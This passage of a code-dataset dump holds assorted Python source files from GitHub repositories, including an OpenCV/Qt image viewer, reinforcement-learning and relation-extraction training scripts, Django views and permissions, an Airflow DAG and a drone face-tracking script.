cv2.COLOR_BGR2GRAY)\r\n kernel = np.ones((3, 3), np.uint8)\r\n imgop = cv2.morphologyEx(imggray, cv2.MORPH_OPEN, kernel)\r\n imgdx = cv2.Sobel(imgop, cv2.CV_32F, 1, 0, ksize=3)\r\n imgdy = cv2.Sobel(imgop, cv2.CV_32F, 0, 1, ksize=3)\r\n imgsob32f = cv2.add(np.square(imgdx), np.square(imgdy))\r\n imgsob = np.uint8(np.sqrt(imgsob32f))\r\n ret, imgthr = cv2.threshold(imgsob, 0, 255,\r\n cv2.THRESH_BINARY+cv2.THRESH_OTSU)\r\n return cv2.cvtColor(imgthr, cv2.COLOR_GRAY2BGR)\r\n\r\n def doprocesssmooth(self, img):\r\n return cv2.blur(img, (3, 3))\r\n\r\n def doprocessfrequency(self, img):\r\n imggray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n imgfreq = np.fft.fft2(imggray)\r\n imgfreq = np.fft.fftshift(imgfreq)\r\n imgabs = np.absolute(imgfreq)\r\n imglog = np.log(imgabs)\r\n imgones = np.ones_like(imglog)\r\n imgres = np.uint8(\r\n (imglog-imgones*imglog.min())*255/(imglog.max()-imglog.min()))\r\n return cv2.cvtColor(imgres, cv2.COLOR_GRAY2BGR)\r\n\r\n def applyfilter(self, img=None):\r\n filterdict = {'None': self.doprocessnone,\r\n 'Edges': self.doprocessedges,\r\n 'Smooth': self.doprocesssmooth,\r\n 'Freq': self.doprocessfrequency\r\n }\r\n if self.filter is None:\r\n self.filter = 'None'\r\n if img is None:\r\n return filterdict[self.filter](self.inp)\r\n else:\r\n return filterdict[self.filter](img)\r\n\r\n def showoutput(self):\r\n self.outp = self.applyfilter()\r\n pixmap = None\r\n \r\n if self.outp is not None:\r\n pixmap = self.createfromBGRimage(self.outp)\r\n self.gethist(self.outp)\r\n return pixmap\r\n \r\n def showinput(self):\r\n if self.inp is None:\r\n self.getinput()\r\n pixmap = self.createfromBGRimage(self.inp)\r\n self.gethist(self.inp)\r\n return pixmap\r\n\r\n def createfromBGRimage(self, image):\r\n imrgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n qim = QtGui.QImage(imrgb.data, imrgb.shape[1], imrgb.shape[0],\r\n QtGui.QImage.Format_RGB888)\r\n return QtGui.QPixmap(qim)\r\n\r\n def createfromgrayimage(self, image):\r\n imrgb = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)\r\n qim = QtGui.QImage(imrgb.data, imrgb.shape[1], imrgb.shape[0],\r\n QtGui.QImage.Format_RGB888)\r\n return QtGui.QPixmap(qim)\r\n\r\n def close(self):\r\n plt.close('all')\r\n\r\n\r\nclass SacApp(QtWidgets.QApplication):\r\n \"\"\"\r\n Main Qt application\r\n \"\"\"\r\n\r\n def __init__(self, param):\r\n super(SacApp, self).__init__(param)\r\n\r\ndef main():\r\n app = SacApp(sys.argv)\r\n win = SacWindow()\r\n win.show()\r\n\r\n ret = app.exec_()\r\n return ret\r\n \r\nif __name__ == '__main__':\r\n print('Sacvision 0.0.1: (c) 2017-2022 Luis Díaz Saco')\r\n sys.exit(main())\r\n","repo_name":"luisdsaco/sacvision","sub_path":"src/sacvision/sacvisionapp.py","file_name":"sacvisionapp.py","file_ext":"py","file_size_in_byte":23471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18178801233","text":"from tf_based.bic import BICModel\nimport argparse\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--model', default='../notebooks/output/50-context-500000-data-18-questions/485000/model/5dim/', type=str)\n parser.add_argument('--data', default='../notebooks/output/50-context-500000-data-18-questions/485000/scope_full.csv', type=str)\n args = parser.parse_args()\n\n model = BICModel(args.model, args.data)\n result = - model.log_likelihood()\n print('Minus log likelihood: ', 
result)\n","repo_name":"truythu169/snml-skip-gram","sub_path":"tf_based/bic/cross_validation.py","file_name":"cross_validation.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74481544871","text":"'''\nauthor : Shreya Pawaskar\nlink : https://practice.geeksforgeeks.org/problems/-rearrange-array-alternately-1587115620/1\n'''\n\nt=int(input())\nfor it in range(0,t):\n n=int(input())\n l=input().split()\n for i in range(0,len(l)):\n l[i]=int(l[i])\n \n l1=[] # result list, O(n) extra space\n \n for i in range(0,(len(l)//2)):\n l1.append(l[len(l)-1-i])\n l1.append(l[i])\n \n if len(l)%2!=0:#odd length\n l1.append(l[(len(l)//2)])\n \n for j in range(0,len(l1)):#printing\n print(l1[j],end=\" \")\n print(\" \")\n \n ","repo_name":"errorinc0de/Coding-Questions","sub_path":"GeeksforGeeks/Rearrange Array Alternately/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"72"} +{"seq_id":"14341780034","text":"# Definition for a binary tree node.\n# 783. Minimum Distance Between BST Nodes\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nimport sys\nclass Solution:\n def minDiffInBST(self, root: TreeNode) -> int:\n if root is None:\n return 0\n pre_node = None\n min_val = sys.maxsize\n min_val, pre_node = self.getMin(root, pre_node, min_val)\n return min_val\n\n\n def getMin(self, root, pre_node, min_val):\n if root is None:\n return min_val, pre_node\n min_val, pre_node = self.getMin(root.left, pre_node, min_val)\n if pre_node is not None:\n min_val = min(root.val - pre_node.val, min_val)\n pre_node = root\n min_val, pre_node = self.getMin(root.right, pre_node, min_val)\n return min_val, pre_node\n\n","repo_name":"yuyaxiong/interveiw_algorithm","sub_path":"LeetCode/二叉搜索树/783.py","file_name":"783.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2286396998","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as funct\n\nfrom live_graph import Live_graph\nimport multiprocessing as mp\n\n\nfrom agent import Agent\nfrom icm_model import Icm\n\nimport gym\nimport numpy as np\n\n\nimport time\n\ngame=gym.make('Acrobot-v1')\n\ninput_size=game.observation_space.shape[0]\noutput_size=game.action_space.n\ngamma=.9\nepsilon=.1\n\nagent=Agent(input_size,200,output_size,20,epsilon,gamma)\nicm=Icm(input_size,200,output_size,gamma,.1)\n\n\n\n# lgraph=Live_graph()\n# lgraph.add_new_object('icm_model')\n\n\naction_skips=2\n\n\npast_rewards=[]\npast_size=20\n\n\nwhile True:\n state=np.array(game.reset())\n total_rewards=0\n \n for i in range(10000):\n\n game.render()\n action,dex=agent.get_action(state)\n\n new_state,reward,done,_ = game.step(dex)\n \n intrinsic_reward=icm.get_intrinsic_reward(state,action,new_state)\n \n total_rewards+=reward\n \n reward=reward+intrinsic_reward.item()\n \n \n \n \n\n # time.sleep(.05)\n\n\n if done or i == 500:\n # lgraph.add_new_info(['icm_model'],[reward])\n # total_rewards-=5\n\n # reward=-1\n\n agent.n_games+=1\n\n\n agent.remember(state,action,reward,new_state,done)\n agent.train_short_memory(state,action,reward,new_state,done)\n \n icm.remember(state,action,new_state)\n icm.train_models(state,action,new_state)\n\n past_rewards.append(total_rewards)\n if 
len(past_rewards)>past_size:\n past_rewards.pop(0)\n\n print('*'*50)\n print(agent.get_ratios(),'- game#: ',agent.n_games, '- total reward: ',total_rewards)\n print('average ',round(sum(past_rewards)/len(past_rewards),4),'-','reward: ',reward)\n print('chosen: ',dex,'- actions: ',[i.item() for i in action])\n print('*'*50)\n\n agent.reset_ratios()\n break\n\n else:\n\n if i%action_skips==0:\n agent.remember(state,action,reward,new_state,done)\n agent.train_short_memory(state,action,reward,new_state,done)\n \n icm.remember(state,action,new_state)\n icm.train_models(state,action,new_state)\n \n \n\n state=new_state\n\n agent.train_long_memory()\n # icm.train_long_memory()\n\n if agent.n_games>=10000:\n break\n\n\n\n\ngame.close() \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"syntax-co/Acrobat_trainer_OpenAI","sub_path":"Acrobot.py","file_name":"Acrobot.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"43070595279","text":"import argparse\nimport os\nimport shutil\nfrom runners.utils import make_dir\nfrom evaluation.LPIPS import calc_LPIPS, find_max_min_LPIPS\nfrom evaluation.diversity import calc_diversity\n\n\ndef rename_sample_files(source_dir: str, target_dir: str):\n flist = os.listdir(source_dir)\n flist.sort()\n make_dir(target_dir)\n\n total = len(flist)\n for i in range(total):\n if i % 1000 == 0:\n print(f\"{i} samples\")\n fpath = os.path.join(source_dir, flist[i])\n if os.path.isdir(fpath):\n shutil.copytree(os.path.join(source_dir, flist[i]),\n os.path.join(target_dir, str(i)))\n elif os.path.isfile(fpath):\n shutil.copy(os.path.join(source_dir, flist[i]),\n os.path.join(target_dir, f\"{str(i)}.png\"))\n else:\n raise NotImplementedError\n\n\ndef copy_sample_files(source_dir: str, target_dir: str):\n flist = os.listdir(source_dir)\n flist.sort()\n make_dir(target_dir)\n\n total = len(flist)\n for i in range(total):\n if i % 1000 == 0:\n print(f\"{i} samples\")\n shutil.copy(os.path.join(source_dir, flist[i], 'output_0.png'),\n os.path.join(target_dir, f'{flist[i]}.png'))\n\n\ndef parse_args_and_config():\n parser = argparse.ArgumentParser(description=globals()['__doc__'])\n parser.add_argument('-f', '--func_name', type=str, default=None, help='Name of the function to run')\n parser.add_argument('-r', '--root_dir', type=str, default=None, help='Path to the root directory')\n parser.add_argument('-s', '--source_dir', type=str, default=None, help='Path to the source directory')\n parser.add_argument('-t', '--target_dir', type=str, default=None, help='Path to the target directory')\n parser.add_argument('-n', '--num_samples', type=int, default=1, help='Number of samples per condition')\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_args_and_config()\n if args.func_name == \"rename_samples\":\n source_dir = os.path.join(args.root_dir, args.source_dir)\n target_dir = os.path.join(args.root_dir, args.target_dir)\n print(f\"rename sample files from {source_dir} to {target_dir}\")\n rename_sample_files(source_dir=source_dir, target_dir=target_dir)\n elif args.func_name == \"copy_samples\":\n source_dir = os.path.join(args.root_dir, args.source_dir)\n target_dir = os.path.join(args.root_dir, args.target_dir)\n print(f\"copy sample files from {source_dir} to {target_dir}\")\n copy_sample_files(source_dir=source_dir, target_dir=target_dir)\n elif args.func_name == \"LPIPS\":\n print(f\"calculate LPIPS {args.source_dir}\")\n 
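# LPIPS (Learned Perceptual Image Patch Similarity) scores image pairs by their distance in a deep feature space; lower means more similar. Presumably calc_LPIPS compares each sample in source_dir against its ground truth in target_dir.\n 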
calc_LPIPS(data_dir=args.source_dir, gt_dir=args.target_dir, num_samples=args.num_samples)\n elif args.func_name == \"max_min_LPIPS\":\n print(f\"calculate max_min_LPIPS {args.source_dir}\")\n find_max_min_LPIPS(data_dir=args.source_dir, gt_dir=args.target_dir, num_samples=args.num_samples)\n elif args.func_name == \"diversity\":\n print(f\"calculate diversity {args.source_dir}\")\n calc_diversity(data_dir=args.source_dir, num_samples=args.num_samples)\n else:\n raise NotImplementedError\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"xuekt98/BBDM","sub_path":"preprocess_and_evaluation.py","file_name":"preprocess_and_evaluation.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","stars":115,"dataset":"github-code","pt":"72"} +{"seq_id":"4080893308","text":"import pendulum\n\nfrom airflow import DAG\nfrom airflow.operators.python import PythonOperator\n\n# from my_company.common_package.common_module import cm_var\n# from my_company.common_package.subpackage.subpackaged_util_module import spum_var\n# from my_company.my_custom_dags.base_dag import my_base_function\n\n\ndef my_function():\n print(\"my_company.my_custom_dags.my_dag1.my_function\")\n\n\nwith DAG(\n dag_id='my_company.my_custom_dags.my_dag1.dag',\n default_args={\n 'owner': 'csprl',\n 'depends_on_past': False,\n 'email': ['airflow@example.com'],\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 0,\n },\n description='A simple tutorial DAG',\n schedule_interval=None,\n start_date=pendulum.datetime(2022, 3, 1),\n catchup=False,\n tags=['troubleshooting', 'imports'],\n) as dag:\n t1 = PythonOperator(\n task_id='my_dag1.t1',\n python_callable=my_function,\n dag=dag\n )\n\n t1\n","repo_name":"csprl-nowigence/airflow_exploration","sub_path":"my_company/my_custom_dags/my_dag1.py","file_name":"my_dag1.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26936994790","text":"from django.urls import path\nfrom app_cad_usuarios import views\n\nurlpatterns = [\n # Route for the home page\n path('', views.home, name='home'),\n\n # Route for the \"juju\" page\n path('juju/', views.juju, name='juju'), \n # http://127.0.0.1:8000/juju/\n \n # Route for listing users\n path('usuarios/', views.usuarios, name='listagem_usuarios'),\n \n]\n","repo_name":"DevBrunoo/wiki-HBS","sub_path":"projecttst/projeto_cad_usuarios/projeto_cad_usuarios/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14035937798","text":"from typing import Tuple\nimport torch\nfrom torch import nn\n\n\ndef make_resnet(\n in_channels,\n num_layers,\n activation,\n kernel_size,\n max_num_channels=512,\n dropout=0.0,\n stride=1,\n min_exponent=4, # number of conv filters increases exponentially from a layer to the next\n):\n out_exponent = min_exponent + 1\n layers = [\n nn.Conv2d(\n in_channels,\n 2 ** min_exponent,\n kernel_size=kernel_size,\n padding=kernel_size // 2,\n stride=stride,\n ),\n nn.BatchNorm2d(2 ** min_exponent),\n nn.Dropout(dropout),\n activation,\n ]\n layers += [\n # channel count doubles from one block to the next (with min_exponent = 4: 16 -> 32, 32 -> 64, ...),\n # capped at max_num_channels; with num_layers = 3 the last block outputs 128 channels\n resnet_block(\n min(max_num_channels, 2 ** (min_exponent + i)),\n min(max_num_channels, 2 ** (out_exponent + i)),\n kernel_size=kernel_size,\n activation=activation,\n 
dropout=dropout,\n stride=stride,\n )\n for i in range(num_layers)\n ]\n out_channels = min(max_num_channels, 2 ** (out_exponent + num_layers - 1))\n return nn.Sequential(*layers), out_channels\n\n\ndef mlp_block(in_size, out_size, activation, dropout=0.0):\n return nn.Sequential(\n nn.Linear(in_size, out_size),\n nn.BatchNorm1d(out_size),\n nn.Dropout(dropout),\n activation,\n )\n\n\ndef make_mlp(in_size, out_size, hidden_sizes, activation, dropout=0.0):\n if len(hidden_sizes) == 0:\n return mlp_block(in_size, out_size, dropout=dropout, activation=activation)\n\n layers = []\n for i, hidden_size in enumerate(hidden_sizes + [out_size]):\n # if last iteration,\n # append output layer and quit\n if i == len(hidden_sizes):\n layers.append(nn.Linear(in_size, hidden_size))\n break # might have been continue as well, it is the last iteration for sure\n layers.append(\n mlp_block(in_size, hidden_size, dropout=dropout, activation=activation)\n )\n in_size = hidden_size\n\n return nn.Sequential(*layers)\n\n\ndef resnet_block(\n in_channels, out_channels, activation, kernel_size, dropout=0.0, stride=1\n):\n \"\"\"1 residual convolution + 1 regular convolution + max pooling\n results in output width and height shrank by a factor of 2\n \"\"\"\n return nn.Sequential(\n ResidualBlock(\n in_channels, kernel_size=kernel_size, activation=activation, dropout=dropout\n ),\n bottleneck_block(\n in_channels,\n out_channels,\n kernel_size=kernel_size,\n activation=activation,\n dropout=dropout,\n stride=stride,\n ),\n )\n\n\nclass ResidualBlock(nn.Module):\n def __init__(self, channels, kernel_size, activation=nn.Identity(), dropout=0.0):\n super().__init__()\n self.model = nn.Sequential(\n nn.Conv2d(\n channels,\n channels,\n kernel_size=kernel_size,\n padding=kernel_size // 2,\n ),\n nn.BatchNorm2d(channels),\n nn.Dropout(dropout),\n activation,\n )\n\n def forward(self, x):\n return x + self.model(x)\n\n\ndef bottleneck_block(\n in_channels, out_channels, activation, kernel_size=3, dropout=0.0, stride=1\n):\n return nn.Sequential(\n nn.Conv2d(\n in_channels,\n out_channels,\n kernel_size=kernel_size,\n padding=kernel_size // 2,\n stride=stride,\n ),\n nn.BatchNorm2d(out_channels),\n nn.Dropout(dropout),\n activation,\n nn.MaxPool2d(2),\n )\n","repo_name":"MaxPappa/IrisSegmentation","sub_path":"neural/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"13821428945","text":"import cv2\r\nfrom djitellopy import tello\r\nimport time\r\nimport numpy as np\r\nimport mediapipe as mp\r\nmp_face_detection = mp.solutions.face_detection\r\n\r\n\r\nme = tello.Tello()\r\nme.connect()\r\nprint(\"connecting to veronica\")\r\nprint(f\"current battery status -: {me.get_battery()}\")\r\nme.streamon()\r\nme.takeoff()\r\nme.send_rc_control(0, 0, 20, 0)\r\ntime.sleep(.8)\r\n\r\np_time = 0\r\nw, h = 360, 240\r\nfbRange = [6200, 6800]\r\npid = [0.4, 0.4, 0]\r\np_error = 0\r\n\r\ndef detect_face(image):\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n results = face_detection.process(image)\r\n\r\n # Draw face detections of each face.\r\n\r\n faces = []\r\n img_x, img_y, _ = image.shape\r\n\r\n if results.detections:\r\n for detection in results.detections:\r\n x = int(detection.location_data.relative_bounding_box.xmin * img_y)\r\n y = int(detection.location_data.relative_bounding_box.ymin * img_x)\r\n w = int(detection.location_data.relative_bounding_box.width * img_y)\r\n h = 
int(detection.location_data.relative_bounding_box.height * img_x)\r\n cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255), 2)\r\n faces.append((x, y, w, h))\r\n return faces\r\n\r\n\r\ndef find_face(frame):\r\n faces = detect_face(frame)\r\n my_face_list_c = []\r\n my_face_list_area = []\r\n for (x, y, w, h) in faces:\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 0, 255), 2)\r\n c_x = x + w // 2\r\n c_y = y + h // 2\r\n cv2.circle(frame, (c_x, c_y), 2, (0, 255, 0), cv2.FILLED)\r\n my_face_list_c.append([c_x, c_y])\r\n my_face_list_area.append(w * h)\r\n if len(my_face_list_area) != 0:\r\n arg_max = my_face_list_area.index(max(my_face_list_area))\r\n return frame, [my_face_list_c[arg_max], my_face_list_area[arg_max]]\r\n else:\r\n return frame, [[0, 0], 0]\r\n\r\n\r\ndef track_face(info, w, pid, p_error):\r\n area = info[1]\r\n x, y = info[0]\r\n fb = 0\r\n error = x - w // 2\r\n speed = pid[0] * error + pid[1] * (error - p_error)\r\n speed = int(np.clip(speed, -100, 100))\r\n if area > fbRange[0] and area < fbRange[1]:\r\n fb = 0\r\n elif area > fbRange[1]:\r\n fb = -20\r\n\r\n elif area < fbRange[0] and area != 0:\r\n fb = 20\r\n\r\n if x == 0:\r\n speed = 0\r\n error = 0\r\n\r\n me.send_rc_control(0, fb, 0, speed)\r\n # print(speed,fb)\r\n return error\r\n\r\n\r\nwhile True:\r\n\r\n with mp_face_detection.FaceDetection(model_selection=0, min_detection_confidence=0.5) as face_detection:\r\n frame = me.get_frame_read().frame\r\n frame = cv2.resize(frame, (w, h))\r\n\r\n frame, data = find_face(frame)\r\n p_error = track_face(data, w, pid, p_error)\r\n ctime = time.time()\r\n fps = 1 / (ctime - p_time)\r\n p_time = ctime\r\n cv2.putText(frame, str(int(fps)), (50, 100), cv2.FONT_HERSHEY_PLAIN, 5,\r\n (255, 0, 0), 5)\r\n # print(\"Area\",data[1])\r\n\r\n cv2.imshow(\"video\", frame)\r\n key = cv2.waitKey(1)\r\n if key == ord('q'):\r\n me.land()\r\n break","repo_name":"atulyaatul1999/Veronica--Fully-AI-automated-drone","sub_path":"mediapipe face tracking.py","file_name":"mediapipe face tracking.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39802613712","text":"import pandas as pd\nimport selenium\n\n\n# with open('newfile.csv', 'r') as newfile:\n# base = newfile.re\npd.set_option('display.expand_frame_repr', False)\nbase = pd.read_csv('newfile.csv', sep=';') # base of popular words\nbase2 = pd.read_csv('unigram_freq.csv') # base of popular score\nbase2['id'] = range(1, len(base2) + 1)\nbase_final = base2.merge(base, left_on='word', right_on='eng', how='left').fillna('')\nbase_final = base_final.loc[base_final['eng'] != '']\nbase_transcription = pd.read_csv('pars_result.csv', sep=';') # base of parsed words\nbase_final = base_final.merge(base_transcription, left_on='eng', right_on='eng', how='left').fillna('')\n\nbase_final['rus'] = [base_final['rus_y'][i] if base_final['rus_y'][i] != '' else base_final['rus_x'][i] for i in range(len(base_final))]\n#base_final = base_final.set_index('id')\n\nnew_words2 = pd.read_csv('new_words2.csv')\nid_col = [i + 1 for i in range(len(new_words2))]\nnew_words2['new_id'] = id_col\nnew_words2['eng'] = new_words2['eng'].str.lower()\n\nbase_final = base_final.merge(new_words2, left_on='eng', right_on='eng', how='left')\nprint(base_final)\n\nTXT = 'hang out'\n\nwords = TXT.split(', ') if ',' in TXT else TXT.split(' ')\nprint(words)\nbase_final['id'] = base_final['id'].astype(str)\nbase_final['new_id'] = 
base_final['new_id'].astype(str)\n\nword_to_line = base_final.loc[base_final['eng'].isin(words), ['id', 'new_id', 'eng', 'transcription', 'rus']]\nword_to_line['len_eng'] = word_to_line['eng'].str.len()\nword_to_line = word_to_line.sort_values(by='len_eng', ascending=False)\nword_to_line = word_to_line.drop(columns=['len_eng'])\nprint(word_to_line, '\\n')\n\nfor word in word_to_line['eng']:\n TXT = TXT.replace(word, word_to_line.loc[word_to_line['eng'] == word, ['transcription']].iloc[0, 0][1:-1])\n# print('----------------', word_to_line.loc[word_to_line['eng'] == 'heap', ['transcription']].iloc[0, 0])\nTXT = '[' + TXT + ']'\nprint('----------', TXT)\nfor i in word_to_line.values:\n new_line = ';'.join(i)\n print(f'{new_line};0;0;')\n\nprint(pd.read_csv('my_dict.csv', sep=';')['id'].max())\n\n\n\n","repo_name":"Skriaga2014/eng-bot","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15564414538","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n# @Version : Python 3.6\n\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom tqdm import tqdm\nfrom transformers import AdamW\nfrom transformers import get_linear_schedule_with_warmup\nfrom transformers import WEIGHTS_NAME, CONFIG_NAME\n\nfrom config import Config\nfrom utils import RelationLoader, SemEvalDataLoader\nfrom model import R_BERT\nfrom evaluate import Eval\n\n\nclass Runner(object):\n def __init__(self, id2rel, loader, user_config):\n self.class_num = len(id2rel)\n self.id2rel = id2rel\n self.loader = loader\n self.user_config = user_config\n\n self.model = R_BERT(self.class_num, user_config)\n self.model = self.model.to(user_config.device)\n self.eval_tool = Eval(user_config)\n\n def train(self):\n train_loader, dev_loader, _ = self.loader\n num_training_steps = len(train_loader) // self.user_config.\\\n gradient_accumulation_steps * self.user_config.epoch\n num_warmup_steps = int(num_training_steps *\n self.user_config.warmup_proportion)\n\n bert_params = list(map(id, self.model.bert.parameters()))\n rest_params = filter(lambda p: id(\n p) not in bert_params, self.model.parameters())\n\n optimizer_grouped_parameters = [\n {'params': self.model.bert.parameters()},\n {'params': rest_params, 'lr': self.user_config.other_lr},\n ]\n optimizer = AdamW(\n optimizer_grouped_parameters,\n lr=self.user_config.lr,\n eps=self.user_config.adam_epsilon\n )\n scheduler = get_linear_schedule_with_warmup(\n optimizer,\n num_warmup_steps=num_warmup_steps,\n num_training_steps=num_training_steps,\n )\n print('--------------------------------------')\n print('traning model parameters (except PLM layers):')\n for name, param in self.model.named_parameters():\n if id(param) in bert_params:\n continue\n if param.requires_grad:\n print('%s : %s' % (name, str(param.data.shape)))\n\n print('--------------------------------------')\n print('start to train the model ...')\n\n max_f1 = -float('inf')\n for epoch in range(1, 1+self.user_config.epoch):\n train_loss = 0.0\n data_iterator = tqdm(train_loader, desc='Train')\n for _, (data, label) in enumerate(data_iterator):\n self.model.train()\n data = data.to(self.user_config.device)\n label = label.to(self.user_config.device)\n\n optimizer.zero_grad()\n loss, _ = self.model(data, label)\n train_loss += loss.item()\n loss.backward()\n\n nn.utils.clip_grad_norm_(\n self.model.parameters(),\n max_norm=self.user_config.max_grad_norm\n 
)\n optimizer.step()\n scheduler.step()\n\n train_loss = train_loss / len(train_loader)\n\n f1, dev_loss, _ = self.eval_tool.evaluate(self.model, dev_loader)\n print('[%03d] train_loss: %.3f | dev_loss: %.3f | micro f1 on dev: %.4f'\n % (epoch, train_loss, dev_loss, f1), end=' ')\n if f1 > max_f1:\n max_f1 = f1\n model_to_save = self.model.module if hasattr(\n self.model, 'module') else self.model\n output_model_file = os.path.join(\n self.user_config.model_dir, WEIGHTS_NAME)\n output_config_file = os.path.join(\n self.user_config.model_dir, CONFIG_NAME)\n torch.save(model_to_save.state_dict(), output_model_file)\n model_to_save.bert.config.to_json_file(output_config_file)\n print('>>> save models!')\n else:\n print()\n\n def test(self):\n print('--------------------------------------')\n print('start load model ...')\n if not os.path.exists(self.user_config.model_dir):\n raise Exception('no pre-trained model exists!')\n\n state_dict = torch.load(\n os.path.join(self.user_config.model_dir, WEIGHTS_NAME),\n map_location=self.user_config.device\n )\n self.model.load_state_dict(state_dict)\n\n print('--------------------------------------')\n print('start test ...')\n _, _, test_loader = self.loader\n f1, test_loss, predict_label = self.eval_tool.evaluate(self.model, test_loader)\n print('test_loss: %.3f | micro f1 on test: %.4f' % (test_loss, f1))\n return predict_label\n\n\ndef print_result(predict_label, id2rel, start_idx=8001):\n des_file = './eval/predicted_result.txt'\n with open(des_file, 'w', encoding='utf-8') as fw:\n for i in range(0, predict_label.shape[0]):\n fw.write('{}\\t{}\\n'.format(\n start_idx+i, id2rel[int(predict_label[i])]))\n\n\nif __name__ == '__main__':\n user_config = Config()\n print('--------------------------------------')\n print('some config:')\n user_config.print_config()\n\n print('--------------------------------------')\n print('start to load data ...')\n rel2id, id2rel, class_num = RelationLoader(user_config).get_relation()\n loader = SemEvalDataLoader(rel2id, user_config)\n\n train_loader, dev_loader, test_loader = None, None, None\n if user_config.mode == 0: # train mode\n train_loader = loader.get_train()\n dev_loader = loader.get_dev()\n test_loader = loader.get_test()\n elif user_config.mode == 1:\n test_loader = loader.get_test()\n loader = [train_loader, dev_loader, test_loader]\n print('finish!')\n\n runner = Runner(id2rel, loader, user_config)\n if user_config.mode == 0: # train mode\n runner.train()\n predict_label = runner.test()\n elif user_config.mode == 1:\n predict_label = runner.test()\n else:\n raise ValueError('invalid train mode!')\n print_result(predict_label, id2rel)\n","repo_name":"onehaitao/R-BERT-relation-extraction","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":6124,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"6176260644","text":"from services.gsheets_api import get_list\nfrom services.opencage_api import Geocode\n\nGSHEETS_ID = ''\nGSHEETS_RANGE = ''\n\ndef get_cities_list(id, range):\n \"\"\"Gets a list of cities from a google sheets.\"\"\"\n return get_list(id, range)\n\ndef get_coordinates(city_list):\n \"\"\"Gets the coordinates of a city.\"\"\"\n geo = Geocode()\n results = {}\n for city in city_list:\n coordinates = geo.get_coordinates(city)\n results[city] = str(coordinates['results'][0]['geometry']['lat']) + \\\n ', ' + str(coordinates['results'][0]['geometry']['lng'])\n return results\n\ndef main():\n \"\"\"Main Entry 
Point.\"\"\"\n city_list = get_cities_list(GSHEETS_ID, GSHEETS_RANGE)\n city_coordinates = get_coordinates(city_list)\n for city, coordinates in city_coordinates.items():\n print(city, ': ', coordinates)\n\nif __name__ == '__main__':\n main()","repo_name":"marcelodof/gsheets-cities-coordinates","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21233638047","text":"from django.conf import settings\nfrom django.db.models import Q\nfrom rest_framework import generics\nfrom rest_framework import permissions\nfrom .serializers import BookingSerializer, BookingAdminSerializer, BookingPriceAdminSerializer\nfrom phookit.bookingcalendar.models import Booking, BookingPrice\n\n\n# TODO: Move into permissions.py\nclass IsOwnerOrReadOnly(permissions.BasePermission):\n \"\"\"\n Custom permission to only allow owners of an object to edit it.\n \"\"\"\n def has_object_permission(self, request, view, obj):\n # Read permissions are allowed to any request,\n # so we'll always allow GET, HEAD or OPTIONS requests.\n if request.method in permissions.SAFE_METHODS:\n return True\n # Write permissions are only allowed to the owner of the snippet.\n ### return obj.owner == request.user\n return obj.is_editable(request)\n\nclass IsAdminOrReadOnly(permissions.BasePermission):\n \"\"\"\n Custom permission to only allow admins to edit.\n \"\"\"\n def has_object_permission(self, request, view, obj):\n # Read permissions are allowed to any request,\n # so we'll always allow GET, HEAD or OPTIONS requests.\n if request.method in permissions.SAFE_METHODS:\n return True\n # Write permissions are only allowed to admins\n return request.user.is_staff\n\n\nclass BookingList(generics.ListCreateAPIView):\n '''\n Only admins can create new calendar items\n '''\n permission_classes = (permissions.IsAuthenticatedOrReadOnly,\n IsAdminOrReadOnly,)\n serializer_class = BookingSerializer\n\n\n def get_queryset(self):\n \"\"\"\n \"\"\"\n queryset = Booking.objects.all()\n start = self.request.query_params.get('start', None)\n end = self.request.query_params.get('end', None)\n if start and end:\n # get all within date but ignore cancelled bookings\n queryset = queryset.filter(Q(start__gte=start) | Q(end__lte=end)).exclude(status__exact=\"Cancelled\")\n return queryset\n\n\nclass 